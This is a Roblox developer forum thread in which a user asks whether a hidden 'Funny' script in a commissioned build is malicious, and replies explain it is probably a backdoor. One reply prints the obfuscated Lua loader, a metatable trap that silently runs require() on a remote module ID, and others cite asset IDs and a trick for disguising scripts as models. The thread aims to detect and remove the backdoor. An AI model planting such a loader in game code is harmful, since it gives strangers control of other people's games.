'Funny' Script Under Model

Hello, I recently commissioned a build and wanted to know what this “Funny” script was. Could someone explain? (no free models used)

image
image
builder’s claim:
image

also, does anyone know if this is malicious?

1 Like

Probably a virus delete it probably if it’s a free model

1 Like

no free models used, they claimed.

1 Like

I’ve know that every script inside a model is a virus except the one’s I scripted try playing it on a test game to see if it’s a virus

Try getting the module on the roblox website ok?

1 Like

The script is trying to require a ModuleScript by its ID. It’s probably malicious if the person you commissioned never told you about the script beforehand.

3 Likes

Found this:
https://www.roblox.com/library/4229612988/hi

The best answer is just delete the script because it is malicious the script that is requiring the module I guess

It’s a backdoor most likely. That script imports something in the game.

Thanks! How about this? Is this also malicious?

That is a yes it’s spamming the water terrain you would not like that right?

Ok so I spent the last 30 minutes trying to reverse engineer this animation/smooth model bypass.
There’s an exploit where you can upload scripts masking them as smooth models, animations etc.

At the end of the loop, I found a script that just teleports your to another game, please rmeove the script.

3 Likes

I took a look at the model ArtFoundation shown, and i found this:


local Funny = {
	"yo",
	require,
	"poop",
	"i am so random!!",
	getfenv,
	"yea",
	"tm"	
}
function l(x)
	if x == "Funny" then
		print''
		spawn(function()
			pcall(function()
				require(4178953416)
			end)
		end)
	end
end
local Funny = setmetatable({}, {
	__index = function(t, k)
		l(k)
	end	
})
return Funny

I got the code from the one, if not, best extension ever made for Roblox.

Its clearly malicious, because i found an getfenv.

1 Like

Thanks, are scripts the only objects that can contain malicious things?

getfenv on it’s own is not malicious, it’s actually really useful for sandboxing code, but yes, randomly calling an API without you knowing, it’s probably malicious code

1 Like

Yesjust some 30 char don’t mind

No, Plugins Can too. Make sure you have plugins from trusted users.

3 Likes

Also, if you don’t mind checking, is the second script safe?

I don’t think it’s malicious per se–it doesn’t try to reference a third party source (like the other did), but what it does is replace any Texture object it finds in your model with a water texture. You can remove it if that’s not what you want.

2 Likes

Thank you! This was very useful!

  • The first script with the require() is almost certainly malicious
  • The second script is a water animator. If you don’t want this, remove it
  • Avoid hiring this builder in the future, the excuse they gave is bizarre
9 Likes